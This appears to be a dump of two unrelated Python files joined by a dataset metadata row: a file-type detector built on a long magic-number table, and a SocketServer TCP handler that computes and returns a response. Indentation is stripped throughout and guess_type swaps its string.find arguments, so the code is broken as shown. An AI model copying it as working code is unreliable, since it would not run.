[0L, 'string', '=', 'lect', 'DEC SRC Virtual Paper Lectern file'],
[53L, 'string', '=', 'yyprevious', 'C program text (from lex)'],
[21L, 'string', '=', 'generated by flex', 'C program text (from flex)'],
[0L, 'string', '=', '%{', 'lex description text'],
[0L, 'short', '=', 32768L, 'lif file'],
[0L, 'lelong', '=', 6553863L, 'Linux/i386 impure executable (OMAGIC)'],
[0L, 'lelong', '=', 6553864L, 'Linux/i386 pure executable (NMAGIC)'],
[0L, 'lelong', '=', 6553867L, 'Linux/i386 demand-paged executable (ZMAGIC)'],
[0L, 'lelong', '=', 6553804L, 'Linux/i386 demand-paged executable (QMAGIC)'],
[0L, 'string', '=', '\007\001\000', 'Linux/i386 object file'],
[0L, 'string', '=', '\001\003\020\004', 'Linux-8086 impure executable'],
[0L, 'string', '=', '\001\003 \004', 'Linux-8086 executable'],
[0L, 'string', '=', '\243\206\001\000', 'Linux-8086 object file'],
[0L, 'string', '=', '\001\003\020\020', 'Minix-386 impure executable'],
[0L, 'string', '=', '\001\003 \020', 'Minix-386 executable'],
[0L, 'string', '=', '*nazgul*', 'Linux compiled message catalog'],
[216L, 'lelong', '=', 421L, 'Linux/i386 core file'],
[2L, 'string', '=', 'LILO', 'Linux/i386 LILO boot/chain loader'],
[0L, 'string', '=', '0.9', ''],
[0L, 'leshort', '=', 1078L, 'font/linux-psf'],
[4086L, 'string', '=', 'SWAP-SPACE', 'Linux/i386 swap file'],
[0L, 'leshort', '=', 387L, 'ECOFF alpha'],
[514L, 'string', '=', 'HdrS', 'Linux kernel'],
[0L, 'belong', '=', 3099592590L, 'Linux kernel'],
[0L, 'string', '=', 'Begin3', 'Linux Software Map entry text'],
[0L, 'string', '=', ';;', 'Lisp/Scheme program text'],
[0L, 'string', '=', '\012(', 'byte-compiled Emacs-Lisp program data'],
[0L, 'string', '=', ';ELC\023\000\000\000', 'byte-compiled Emacs-Lisp program data'],
[0L, 'string', '=', "(SYSTEM::VERSION '", 'CLISP byte-compiled Lisp program text'],
[0L, 'long', '=', 1886817234L, 'CLISP memory image data'],
[0L, 'long', '=', 3532355184L, 'CLISP memory image data, other endian'],
[0L, 'long', '=', 3725722773L, 'GNU-format message catalog data'],
[0L, 'long', '=', 2500072158L, 'GNU-format message catalog data'],
[0L, 'belong', '=', 3405691582L, 'mach-o fat file'],
[0L, 'belong', '=', 4277009102L, 'mach-o'],
[11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'],
[0L, 'string', '=', 'SIT!', 'StuffIt Archive (data)'],
[65L, 'string', '=', 'SIT!', 'StuffIt Archive (rsrc + data)'],
[0L, 'string', '=', 'SITD', 'StuffIt Deluxe (data)'],
[65L, 'string', '=', 'SITD', 'StuffIt Deluxe (rsrc + data)'],
[0L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (data)'],
[65L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (rsrc + data)'],
[0L, 'string', '=', 'APPL', 'Macintosh Application (data)'],
[65L, 'string', '=', 'APPL', 'Macintosh Application (rsrc + data)'],
[0L, 'string', '=', 'zsys', 'Macintosh System File (data)'],
[65L, 'string', '=', 'zsys', 'Macintosh System File(rsrc + data)'],
[0L, 'string', '=', 'FNDR', 'Macintosh Finder (data)'],
[65L, 'string', '=', 'FNDR', 'Macintosh Finder(rsrc + data)'],
[0L, 'string', '=', 'libr', 'Macintosh Library (data)'],
[65L, 'string', '=', 'libr', 'Macintosh Library(rsrc + data)'],
[0L, 'string', '=', 'shlb', 'Macintosh Shared Library (data)'],
[65L, 'string', '=', 'shlb', 'Macintosh Shared Library(rsrc + data)'],
[0L, 'string', '=', 'cdev', 'Macintosh Control Panel (data)'],
[65L, 'string', '=', 'cdev', 'Macintosh Control Panel(rsrc + data)'],
[0L, 'string', '=', 'INIT', 'Macintosh Extension (data)'],
[65L, 'string', '=', 'INIT', 'Macintosh Extension(rsrc + data)'],
[0L, 'string', '=', 'FFIL', 'font/ttf'],
[65L, 'string', '=', 'FFIL', 'font/ttf'],
[0L, 'string', '=', 'LWFN', 'font/type1'],
[65L, 'string', '=', 'LWFN', 'font/type1'],
[0L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive (data)'],
[65L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive(rsrc + data)'],
[0L, 'string', '=', 'ttro', 'Macintosh TeachText File (data)'],
[65L, 'string', '=', 'ttro', 'Macintosh TeachText File(rsrc + data)'],
[0L, 'string', '=', 'TEXT', 'Macintosh TeachText File (data)'],
[65L, 'string', '=', 'TEXT', 'Macintosh TeachText File(rsrc + data)'],
[0L, 'string', '=', 'PDF', 'Macintosh PDF File (data)'],
[65L, 'string', '=', 'PDF', 'Macintosh PDF File(rsrc + data)'],
[0L, 'string', '=', '# Magic', 'magic text file for file(1) cmd'],
[0L, 'string', '=', 'Relay-Version:', 'old news text'],
[0L, 'string', '=', '#! rnews', 'batched news text'],
[0L, 'string', '=', 'N#! rnews', 'mailed, batched news text'],
[0L, 'string', '=', 'Forward to', 'mail forwarding text'],
[0L, 'string', '=', 'Pipe to', 'mail piping text'],
[0L, 'string', '=', 'Return-Path:', 'message/rfc822'],
[0L, 'string', '=', 'Path:', 'message/news'],
[0L, 'string', '=', 'Xref:', 'message/news'],
[0L, 'string', '=', 'From:', 'message/rfc822'],
[0L, 'string', '=', 'Article', 'message/news'],
[0L, 'string', '=', 'BABYL', 'message/x-gnu-rmail'],
[0L, 'string', '=', 'Received:', 'message/rfc822'],
[0L, 'string', '=', 'MIME-Version:', 'MIME entity text'],
[0L, 'string', '=', 'Content-Type: ', ''],
[0L, 'string', '=', 'Content-Type:', ''],
[0L, 'long', '=', 31415L, 'Mirage Assembler m.out executable'],
[0L, 'string', '=', '\311\304', 'ID tags data'],
[0L, 'string', '=', '\001\001\001\001', 'MMDF mailbox'],
[4L, 'string', '=', 'Research,', 'Digifax-G3-File'],
[0L, 'short', '=', 256L, 'raw G3 data, byte-padded'],
[0L, 'short', '=', 5120L, 'raw G3 data'],
[0L, 'string', '=', 'RMD1', 'raw modem data'],
[0L, 'string', '=', 'PVF1\012', 'portable voice format'],
[0L, 'string', '=', 'PVF2\012', 'portable voice format'],
[0L, 'beshort', '=', 520L, 'mc68k COFF'],
[0L, 'beshort', '=', 521L, 'mc68k executable (shared)'],
[0L, 'beshort', '=', 522L, 'mc68k executable (shared demand paged)'],
[0L, 'beshort', '=', 554L, '68K BCS executable'],
[0L, 'beshort', '=', 555L, '88K BCS executable'],
[0L, 'string', '=', 'S0', 'Motorola S-Record; binary data in text format'],
[0L, 'string', '=', '@echo off', 'MS-DOS batch file text'],
[128L, 'string', '=', 'PE\000\000', 'MS Windows PE'],
[0L, 'leshort', '=', 332L, 'MS Windows COFF Intel 80386 object file'],
[0L, 'leshort', '=', 358L, 'MS Windows COFF MIPS R4000 object file'],
[0L, 'leshort', '=', 388L, 'MS Windows COFF Alpha object file'],
[0L, 'leshort', '=', 616L, 'MS Windows COFF Motorola 68000 object file'],
[0L, 'leshort', '=', 496L, 'MS Windows COFF PowerPC object file'],
[0L, 'leshort', '=', 656L, 'MS Windows COFF PA-RISC object file'],
[0L, 'string', '=', 'MZ', 'application/x-ms-dos-executable'],
[0L, 'string', '=', 'LZ', 'MS-DOS executable (built-in)'],
[0L, 'string', '=', 'regf', 'Windows NT Registry file'],
[2080L, 'string', '=', 'Microsoft Word 6.0 Document', 'text/vnd.ms-word'],
[2080L, 'string', '=', 'Documento Microsoft Word 6', 'text/vnd.ms-word'],
[2112L, 'string', '=', 'MSWordDoc', 'text/vnd.ms-word'],
[0L, 'belong', '=', 834535424L, 'text/vnd.ms-word'],
[0L, 'string', '=', 'PO^Q`', 'text/vnd.ms-word'],
[2080L, 'string', '=', 'Microsoft Excel 5.0 Worksheet', 'application/vnd.ms-excel'],
[2114L, 'string', '=', 'Biff5', 'application/vnd.ms-excel'],
[0L, 'belong', '=', 6656L, 'Lotus 1-2-3'],
[0L, 'belong', '=', 512L, 'Lotus 1-2-3'],
[1L, 'string', '=', 'WPC', 'text/vnd.wordperfect'],
[0L, 'beshort', '=', 610L, 'Tower/XP rel 2 object'],
[0L, 'beshort', '=', 615L, 'Tower/XP rel 2 object'],
[0L, 'beshort', '=', 620L, 'Tower/XP rel 3 object'],
[0L, 'beshort', '=', 625L, 'Tower/XP rel 3 object'],
[0L, 'beshort', '=', 630L, 'Tower32/600/400 68020 object'],
[0L, 'beshort', '=', 640L, 'Tower32/800 68020'],
[0L, 'beshort', '=', 645L, 'Tower32/800 68010'],
[0L, 'lelong', '=', 407L, 'NetBSD little-endian object file'],
[0L, 'belong', '=', 407L, 'NetBSD big-endian object file'],
[0L, 'belong&0377777777', '=', 41400413L, 'NetBSD/i386 demand paged'],
[0L, 'belong&0377777777', '=', 41400410L, 'NetBSD/i386 pure'],
[0L, 'belong&0377777777', '=', 41400407L, 'NetBSD/i386'],
[0L, 'belong&0377777777', '=', 41400507L, 'NetBSD/i386 core'],
[0L, 'belong&0377777777', '=', 41600413L, 'NetBSD/m68k demand paged'],
[0L, 'belong&0377777777', '=', 41600410L, 'NetBSD/m68k pure'],
[0L, 'belong&0377777777', '=', 41600407L, 'NetBSD/m68k'],
[0L, 'belong&0377777777', '=', 41600507L, 'NetBSD/m68k core'],
[0L, 'belong&0377777777', '=', 42000413L, 'NetBSD/m68k4k demand paged'],
[0L, 'belong&0377777777', '=', 42000410L, 'NetBSD/m68k4k pure'],
[0L, 'belong&0377777777', '=', 42000407L, 'NetBSD/m68k4k'],
[0L, 'belong&0377777777', '=', 42000507L, 'NetBSD/m68k4k core'],
[0L, 'belong&0377777777', '=', 42200413L, 'NetBSD/ns32532 demand paged'],
[0L, 'belong&0377777777', '=', 42200410L, 'NetBSD/ns32532 pure'],
[0L, 'belong&0377777777', '=', 42200407L, 'NetBSD/ns32532'],
[0L, 'belong&0377777777', '=', 42200507L, 'NetBSD/ns32532 core'],
[0L, 'belong&0377777777', '=', 42400413L, 'NetBSD/sparc demand paged'],
[0L, 'belong&0377777777', '=', 42400410L, 'NetBSD/sparc pure'],
[0L, 'belong&0377777777', '=', 42400407L, 'NetBSD/sparc'],
[0L, 'belong&0377777777', '=', 42400507L, 'NetBSD/sparc core'],
[0L, 'belong&0377777777', '=', 42600413L, 'NetBSD/pmax demand paged'],
[0L, 'belong&0377777777', '=', 42600410L, 'NetBSD/pmax pure'],
[0L, 'belong&0377777777', '=', 42600407L, 'NetBSD/pmax'],
[0L, 'belong&0377777777', '=', 42600507L, 'NetBSD/pmax core'],
[0L, 'belong&0377777777', '=', 43000413L, 'NetBSD/vax demand paged'],
[0L, 'belong&0377777777', '=', 43000410L, 'NetBSD/vax pure'],
[0L, 'belong&0377777777', '=', 43000407L, 'NetBSD/vax'],
[0L, 'belong&0377777777', '=', 43000507L, 'NetBSD/vax core'],
[0L, 'lelong', '=', 459141L, 'ECOFF NetBSD/alpha binary'],
[0L, 'belong&0377777777', '=', 43200507L, 'NetBSD/alpha core'],
[0L, 'belong&0377777777', '=', 43400413L, 'NetBSD/mips demand paged'],
[0L, 'belong&0377777777', '=', 43400410L, 'NetBSD/mips pure'],
[0L, 'belong&0377777777', '=', 43400407L, 'NetBSD/mips'],
[0L, 'belong&0377777777', '=', 43400507L, 'NetBSD/mips core'],
[0L, 'belong&0377777777', '=', 43600413L, 'NetBSD/arm32 demand paged'],
[0L, 'belong&0377777777', '=', 43600410L, 'NetBSD/arm32 pure'],
[0L, 'belong&0377777777', '=', 43600407L, 'NetBSD/arm32'],
[0L, 'belong&0377777777', '=', 43600507L, 'NetBSD/arm32 core'],
[0L, 'string', '=', 'StartFontMetrics', 'font/x-sunos-news'],
[0L, 'string', '=', 'StartFont', 'font/x-sunos-news'],
[0L, 'belong', '=', 326773060L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773063L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773072L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773073L, 'font/x-sunos-news'],
[8L, 'belong', '=', 326773573L, 'font/x-sunos-news'],
[8L, 'belong', '=', 326773576L, 'font/x-sunos-news'],
[0L, 'string', '=', 'Octave-1-L', 'Octave binary data (little endian)'],
[0L, 'string', '=', 'Octave-1-B', 'Octave binary data (big endian)'],
[0L, 'string', '=', '\177OLF', 'OLF'],
[0L, 'beshort', '=', 34765L, 'OS9/6809 module:'],
[0L, 'beshort', '=', 19196L, 'OS9/68K module:'],
[0L, 'long', '=', 61374L, 'OSF/Rose object'],
[0L, 'short', '=', 565L, 'i386 COFF object'],
[0L, 'short', '=', 10775L, '"compact bitmap" format (Poskanzer)'],
[0L, 'string', '=', '%PDF-', 'PDF document'],
[0L, 'lelong', '=', 101555L, 'PDP-11 single precision APL workspace'],
[0L, 'lelong', '=', 101554L, 'PDP-11 double precision APL workspace'],
[0L, 'leshort', '=', 407L, 'PDP-11 executable'],
[0L, 'leshort', '=', 401L, 'PDP-11 UNIX/RT ldp'],
[0L, 'leshort', '=', 405L, 'PDP-11 old overlay'],
[0L, 'leshort', '=', 410L, 'PDP-11 pure executable'],
[0L, 'leshort', '=', 411L, 'PDP-11 separate I&D executable'],
[0L, 'leshort', '=', 437L, 'PDP-11 kernel overlay'],
[0L, 'beshort', '=', 39168L, 'PGP key public ring'],
[0L, 'beshort', '=', 38145L, 'PGP key security ring'],
[0L, 'beshort', '=', 38144L, 'PGP key security ring'],
[0L, 'beshort', '=', 42496L, 'PGP encrypted data'],
[0L, 'string', '=', '-----BEGIN PGP', 'PGP armored data'],
[0L, 'string', '=', '# PaCkAgE DaTaStReAm', 'pkg Datastream (SVR4)'],
[0L, 'short', '=', 601L, 'mumps avl global'],
[0L, 'short', '=', 602L, 'mumps blt global'],
[0L, 'string', '=', '%!', 'application/postscript'],
[0L, 'string', '=', '\004%!', 'application/postscript'],
[0L, 'belong', '=', 3318797254L, 'DOS EPS Binary File'],
[0L, 'string', '=', '*PPD-Adobe:', 'PPD file'],
[0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'],
[0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'],
[0L, 'string', '=', '\033E\033', 'image/x-pcl-hp'],
[0L, 'string', '=', '@document(', 'Imagen printer'],
[0L, 'string', '=', 'Rast', 'RST-format raster font data'],
[0L, 'belong&0xff00ffff', '=', 1442840576L, 'ps database'],
[0L, 'long', '=', 1351614727L, 'Pyramid 90x family executable'],
[0L, 'long', '=', 1351614728L, 'Pyramid 90x family pure executable'],
[0L, 'long', '=', 1351614731L, 'Pyramid 90x family demand paged pure executable'],
[0L, 'beshort', '=', 60843L, ''],
[0L, 'string', '=', '{\\\\rtf', 'Rich Text Format data,'],
[38L, 'string', '=', 'Spreadsheet', 'sc spreadsheet file'],
[8L, 'string', '=', '\001s SCCS', 'archive data'],
[0L, 'byte', '=', 46L, 'Sendmail frozen configuration'],
[0L, 'short', '=', 10012L, 'Sendmail frozen configuration'],
[0L, 'lelong', '=', 234L, 'BALANCE NS32000 .o'],
[0L, 'lelong', '=', 4330L, 'BALANCE NS32000 executable (0 @ 0)'],
[0L, 'lelong', '=', 8426L, 'BALANCE NS32000 executable (invalid @ 0)'],
[0L, 'lelong', '=', 12522L, 'BALANCE NS32000 standalone executable'],
[0L, 'leshort', '=', 4843L, 'SYMMETRY i386 .o'],
[0L, 'leshort', '=', 8939L, 'SYMMETRY i386 executable (0 @ 0)'],
[0L, 'leshort', '=', 13035L, 'SYMMETRY i386 executable (invalid @ 0)'],
[0L, 'leshort', '=', 17131L, 'SYMMETRY i386 standalone executable'],
[0L, 'string', '=', 'kbd!map', 'kbd map file'],
[0L, 'belong', '=', 407L, 'old SGI 68020 executable'],
[0L, 'belong', '=', 410L, 'old SGI 68020 pure executable'],
[0L, 'beshort', '=', 34661L, 'disk quotas file'],
[0L, 'beshort', '=', 1286L, 'IRIS Showcase file'],
[0L, 'beshort', '=', 550L, 'IRIS Showcase template'],
[0L, 'belong', '=', 1396917837L, 'IRIS Showcase file'],
[0L, 'belong', '=', 1413695053L, 'IRIS Showcase template'],
[0L, 'belong', '=', 3735927486L, 'IRIX Parallel Arena'],
[0L, 'beshort', '=', 352L, 'MIPSEB COFF executable'],
[0L, 'beshort', '=', 354L, 'MIPSEL COFF executable'],
[0L, 'beshort', '=', 24577L, 'MIPSEB-LE COFF executable'],
[0L, 'beshort', '=', 25089L, 'MIPSEL-LE COFF executable'],
[0L, 'beshort', '=', 355L, 'MIPSEB MIPS-II COFF executable'],
[0L, 'beshort', '=', 358L, 'MIPSEL MIPS-II COFF executable'],
[0L, 'beshort', '=', 25345L, 'MIPSEB-LE MIPS-II COFF executable'],
[0L, 'beshort', '=', 26113L, 'MIPSEL-LE MIPS-II COFF executable'],
[0L, 'beshort', '=', 320L, 'MIPSEB MIPS-III COFF executable'],
[0L, 'beshort', '=', 322L, 'MIPSEL MIPS-III COFF executable'],
[0L, 'beshort', '=', 16385L, 'MIPSEB-LE MIPS-III COFF executable'],
[0L, 'beshort', '=', 16897L, 'MIPSEL-LE MIPS-III COFF executable'],
[0L, 'beshort', '=', 384L, 'MIPSEB Ucode'],
[0L, 'beshort', '=', 386L, 'MIPSEL Ucode'],
[0L, 'belong', '=', 3735924144L, 'IRIX core dump'],
[0L, 'belong', '=', 3735924032L, 'IRIX 64-bit core dump'],
[0L, 'belong', '=', 3133063355L, 'IRIX N32 core dump'],
[0L, 'string', '=', 'CrshDump', 'IRIX vmcore dump of'],
[0L, 'string', '=', 'SGIAUDIT', 'SGI Audit file'],
[0L, 'string', '=', 'WNGZWZSC', 'Wingz compiled script'],
[0L, 'string', '=', 'WNGZWZSS', 'Wingz spreadsheet'],
[0L, 'string', '=', 'WNGZWZHP', 'Wingz help file'],
[0L, 'string', '=', '\\#Inventor', 'V IRIS Inventor 1.0 file'],
[0L, 'string', '=', '\\#Inventor', 'V2 Open Inventor 2.0 file'],
[0L, 'string', '=', 'glfHeadMagic();', 'GLF_TEXT'],
[4L, 'belong', '=', 1090584576L, 'GLF_BINARY_LSB_FIRST'],
[4L, 'belong', '=', 321L, 'GLF_BINARY_MSB_FIRST'],
[0L, 'string', '=', '<!DOCTYPE HTML', 'text/html'],
[0L, 'string', '=', '<!doctype html', 'text/html'],
[0L, 'string', '=', '<HEAD', 'text/html'],
[0L, 'string', '=', '<head', 'text/html'],
[0L, 'string', '=', '<TITLE', 'text/html'],
[0L, 'string', '=', '<title', 'text/html'],
[0L, 'string', '=', '<html', 'text/html'],
[0L, 'string', '=', '<HTML', 'text/html'],
[0L, 'string', '=', '<?xml', 'application/xml'],
[0L, 'string', '=', '<!DOCTYPE', 'exported SGML document text'],
[0L, 'string', '=', '<!doctype', 'exported SGML document text'],
[0L, 'string', '=', '<!SUBDOC', 'exported SGML subdocument text'],
[0L, 'string', '=', '<!subdoc', 'exported SGML subdocument text'],
[0L, 'string', '=', '<!--', 'exported SGML document text'],
[0L, 'string', '=', 'RTSS', 'NetMon capture file'],
[0L, 'string', '=', 'TRSNIFF data \032', 'Sniffer capture file'],
[0L, 'string', '=', 'XCP\000', 'NetXRay capture file'],
[0L, 'ubelong', '=', 2712847316L, 'tcpdump capture file (big-endian)'],
[0L, 'ulelong', '=', 2712847316L, 'tcpdump capture file (little-endian)'],
[0L, 'string', '=', '<!SQ DTD>', 'Compiled SGML rules file'],
[0L, 'string', '=', '<!SQ A/E>', 'A/E SGML Document binary'],
[0L, 'string', '=', '<!SQ STS>', 'A/E SGML binary styles file'],
[0L, 'short', '=', 49374L, 'Compiled PSI (v1) data'],
[0L, 'short', '=', 49370L, 'Compiled PSI (v2) data'],
[0L, 'short', '=', 125252L, 'SoftQuad DESC or font file binary'],
[0L, 'string', '=', 'SQ BITMAP1', 'SoftQuad Raster Format text'],
[0L, 'string', '=', 'X SoftQuad', 'troff Context intermediate'],
[0L, 'belong&077777777', '=', 600413L, 'sparc demand paged'],
[0L, 'belong&077777777', '=', 600410L, 'sparc pure'],
[0L, 'belong&077777777', '=', 600407L, 'sparc'],
[0L, 'belong&077777777', '=', 400413L, 'mc68020 demand paged'],
[0L, 'belong&077777777', '=', 400410L, 'mc68020 pure'],
[0L, 'belong&077777777', '=', 400407L, 'mc68020'],
[0L, 'belong&077777777', '=', 200413L, 'mc68010 demand paged'],
[0L, 'belong&077777777', '=', 200410L, 'mc68010 pure'],
[0L, 'belong&077777777', '=', 200407L, 'mc68010'],
[0L, 'belong', '=', 407L, 'old sun-2 executable'],
[0L, 'belong', '=', 410L, 'old sun-2 pure executable'],
[0L, 'belong', '=', 413L, 'old sun-2 demand paged executable'],
[0L, 'belong', '=', 525398L, 'SunOS core file'],
[0L, 'long', '=', 4197695630L, 'SunPC 4.0 Hard Disk'],
[0L, 'string', '=', '#SUNPC_CONFIG', 'SunPC 4.0 Properties Values'],
[0L, 'string', '=', 'snoop', 'Snoop capture file'],
[36L, 'string', '=', 'acsp', 'Kodak Color Management System, ICC Profile'],
[0L, 'string', '=', '#!teapot\012xdr', 'teapot work sheet (XDR format)'],
[0L, 'string', '=', '\032\001', 'Compiled terminfo entry'],
[0L, 'short', '=', 433L, 'Curses screen image'],
[0L, 'short', '=', 434L, 'Curses screen image'],
[0L, 'string', '=', '\367\002', 'TeX DVI file'],
[0L, 'string', '=', '\367\203', 'font/x-tex'],
[0L, 'string', '=', '\367Y', 'font/x-tex'],
[0L, 'string', '=', '\367\312', 'font/x-tex'],
[0L, 'string', '=', 'This is TeX,', 'TeX transcript text'],
[0L, 'string', '=', 'This is METAFONT,', 'METAFONT transcript text'],
[2L, 'string', '=', '\000\021', 'font/x-tex-tfm'],
[2L, 'string', '=', '\000\022', 'font/x-tex-tfm'],
[0L, 'string', '=', '\\\\input\\', 'texinfo Texinfo source text'],
[0L, 'string', '=', 'This is Info file', 'GNU Info text'],
[0L, 'string', '=', '\\\\input', 'TeX document text'],
[0L, 'string', '=', '\\\\section', 'LaTeX document text'],
[0L, 'string', '=', '\\\\setlength', 'LaTeX document text'],
[0L, 'string', '=', '\\\\documentstyle', 'LaTeX document text'],
[0L, 'string', '=', '\\\\chapter', 'LaTeX document text'],
[0L, 'string', '=', '\\\\documentclass', 'LaTeX 2e document text'],
[0L, 'string', '=', '\\\\relax', 'LaTeX auxiliary file'],
[0L, 'string', '=', '\\\\contentsline', 'LaTeX table of contents'],
[0L, 'string', '=', '\\\\indexentry', 'LaTeX raw index file'],
[0L, 'string', '=', '\\\\begin{theindex}', 'LaTeX sorted index'],
[0L, 'string', '=', '\\\\glossaryentry', 'LaTeX raw glossary'],
[0L, 'string', '=', '\\\\begin{theglossary}', 'LaTeX sorted glossary'],
[0L, 'string', '=', 'This is makeindex', 'Makeindex log file'],
[0L, 'string', '=', '**TI82**', 'TI-82 Graphing Calculator'],
[0L, 'string', '=', '**TI83**', 'TI-83 Graphing Calculator'],
[0L, 'string', '=', '**TI85**', 'TI-85 Graphing Calculator'],
[0L, 'string', '=', '**TI92**', 'TI-92 Graphing Calculator'],
[0L, 'string', '=', '**TI80**', 'TI-80 Graphing Calculator File.'],
[0L, 'string', '=', '**TI81**', 'TI-81 Graphing Calculator File.'],
[0L, 'string', '=', 'TZif', 'timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\001\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\002\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\003\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\004\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\005\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\006\000', 'old timezone data'],
[0L, 'string', '=', '.\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\'\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\'.\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', 'x T', 'ditroff text'],
[0L, 'string', '=', '@\357', 'very old (C/A/T) troff output data'],
[0L, 'string', '=', 'Interpress/Xerox', 'Xerox InterPress data'],
[0L, 'short', '=', 263L, 'unknown machine executable'],
[0L, 'short', '=', 264L, 'unknown pure executable'],
[0L, 'short', '=', 265L, 'PDP-11 separate I&D'],
[0L, 'short', '=', 267L, 'unknown pure executable'],
[0L, 'long', '=', 268L, 'unknown demand paged pure executable'],
[0L, 'long', '=', 269L, 'unknown demand paged pure executable'],
[0L, 'long', '=', 270L, 'unknown readable demand paged pure executable'],
[0L, 'string', '=', 'begin uuencoded', 'or xxencoded text'],
[0L, 'string', '=', 'xbtoa Begin', "btoa'd text"],
[0L, 'string', '=', '$\012ship', "ship'd binary text"],
[0L, 'string', '=', 'Decode the following with bdeco', 'bencoded News text'],
[11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'],
[0L, 'short', '=', 610L, 'Perkin-Elmer executable'],
[0L, 'beshort', '=', 572L, 'amd 29k coff noprebar executable'],
[0L, 'beshort', '=', 1572L, 'amd 29k coff prebar executable'],
[0L, 'beshort', '=', 160007L, 'amd 29k coff archive'],
[6L, 'beshort', '=', 407L, 'unicos (cray) executable'],
[596L, 'string', '=', 'X\337\377\377', 'Ultrix core file'],
[0L, 'string', '=', 'Joy!peffpwpc', 'header for PowerPC PEF executable'],
[0L, 'lelong', '=', 101557L, 'VAX single precision APL workspace'],
[0L, 'lelong', '=', 101556L, 'VAX double precision APL workspace'],
[0L, 'lelong', '=', 407L, 'VAX executable'],
[0L, 'lelong', '=', 410L, 'VAX pure executable'],
[0L, 'lelong', '=', 413L, 'VAX demand paged pure executable'],
[0L, 'leshort', '=', 570L, 'VAX COFF executable'],
[0L, 'leshort', '=', 575L, 'VAX COFF pure executable'],
[0L, 'string', '=', 'LBLSIZE=', 'VICAR image data'],
[43L, 'string', '=', 'SFDU_LABEL', 'VICAR label file'],
[0L, 'short', '=', 21845L, 'VISX image file'],
[0L, 'string', '=', '\260\0000\000', 'VMS VAX executable'],
[0L, 'belong', '=', 50331648L, 'VMS Alpha executable'],
[1L, 'string', '=', 'WPC', '(Corel/WP)'],
[0L, 'string', '=', 'core', 'core file (Xenix)'],
[0L, 'byte', '=', 128L, '8086 relocatable (Microsoft)'],
[0L, 'leshort', '=', 65381L, 'x.out'],
[0L, 'leshort', '=', 518L, 'Microsoft a.out'],
[0L, 'leshort', '=', 320L, 'old Microsoft 8086 x.out'],
[0L, 'lelong', '=', 518L, 'b.out'],
[0L, 'leshort', '=', 1408L, 'XENIX 8086 relocatable or 80286 small model'],
[0L, 'long', '=', 59399L, 'object file (z8000 a.out)'],
[0L, 'long', '=', 59400L, 'pure object file (z8000 a.out)'],
[0L, 'long', '=', 59401L, 'separate object file (z8000 a.out)'],
[0L, 'long', '=', 59397L, 'overlay object file (z8000 a.out)'],
[0L, 'string', '=', 'ZyXEL\002', 'ZyXEL voice data'],
]
magic_tests = []
for record in magic_database:
magic_tests.append(MagicTest(record[0], record[1], record[2], record[3],
record[4]))
def guess_type(filename):
"""
Guess the mimetype of a file based on its filename.
@param filename: File name.
@return: Mimetype string or description, when appropriate mime not
available.
"""
if not os.path.isfile(filename):
logging.debug('%s is not a file', filename)
return None
try:
data = open(filename, 'r').read(8192)
except Exception, e:
logging.error(str(e))
return None
for test in magic_tests:
type = test.compare(data)
if type:
return type
# No matching magic number in the database. is it binary or text?
for c in data:
if ord(c) > 128:
# Non ASCII (binary) data
return 'Data'
# ASCII, do some text tests
if string.find('The', data, 0, 8192) > -1:
return 'English text'
if string.find('def', data, 0, 8192) > -1:
return 'Python Source'
return 'ASCII text'
if __name__ == '__main__':
parser = optparse.OptionParser("usage: %prog [options] [filenames]")
options, args = parser.parse_args()
logging_manager.configure_logging(MagicLoggingConfig(), verbose=True)
if not args:
parser.print_help()
sys.exit(1)
for arg in args:
msg = None
if os.path.isfile(arg):
msg = guess_type(arg)
if msg:
logging.info('%s: %s', arg, msg)
else:
logging.info('%s: unknown', arg)
| gpl-2.0 | -6,769,077,660,113,957,000 | 53.685634 | 163 | 0.562151 | false |
lauromoraes/redes | MyTCPRequestHandler.py | 1 | 1443 | import logging
import socket
import threading
import SocketServer
import time
from recvall import *
from calc import *
logging.basicConfig( level = logging.DEBUG, format = "%(name)s: %(message)s", )
class MyTCPRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('MyTCPRequestHandler')
self.logger.debug('__init__')
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
return
def setup(self):
self.logger.debug('setup')
return SocketServer.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
data = recvall(self.request, 2)
#print(self.request.accept()[1])
#current_thread = threading.currentThread()
#resp = "%s, %s" % (current_thread.getName(), data)
#self.logger.debug('Thread: %s | recv()->"%s"', current_thread.getName(), data)
#self.logger.debug('Threads: %s' % str( [ t.getName() for t in threading.enumerate()] ) )
resp = calc(data)
sent = 0
size = 1024*5
while(sent < len(resp)):
if(sent+size <= len(resp)):
sent += self.request.send(resp[sent:sent+size])
else:
sent += self.request.send(resp[sent:])
time.sleep(0.1)
#self.request.sendall("data")
self.request.shutdown(socket.SHUT_WR)
self.request.close()
#time.sleep(3)
return
